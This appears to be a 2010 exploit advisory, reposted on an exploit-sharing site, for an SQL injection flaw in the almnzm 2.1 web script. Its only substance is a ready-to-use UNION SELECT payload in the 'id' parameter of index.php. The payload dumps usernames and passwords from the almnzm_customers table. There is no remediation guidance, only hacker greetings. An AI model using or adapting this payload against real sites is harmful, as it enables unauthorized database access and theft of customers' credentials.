id: 11811
date: 04/14/2010
title: almnzm 2.1 <= SQL Injection Vulnerability
author: NeX HaCkeR
cves: 

=========================================
almnzm 2.1 <= SQL Injection Vulnerability
=========================================

# Title: almnzm 2.1 <= SQL Injection Vulnerability
# Author: NeX HaCkEr
# Published: 2010-04-14
# Contact= error_log@hotmail.com
#Script site :http://www.almnzm.com
 
 
 
 
[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::]
>> #1 Vulnerability
Type = SQL Injection
Example URL = index.php?a=pages&id=3' and 1=0 UnIon aLL Select 1,2,concat(username,0x3a,password),4,5,6,7 from almnzm_customers--%20
 
 
[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::]
 
 
 
 
[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::]
>> Greetz
= Dr.DaShEr, DaMI, dr.kasber, RmZ AlJnooP =
[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::]



#  0day.today [2023-03-26]  #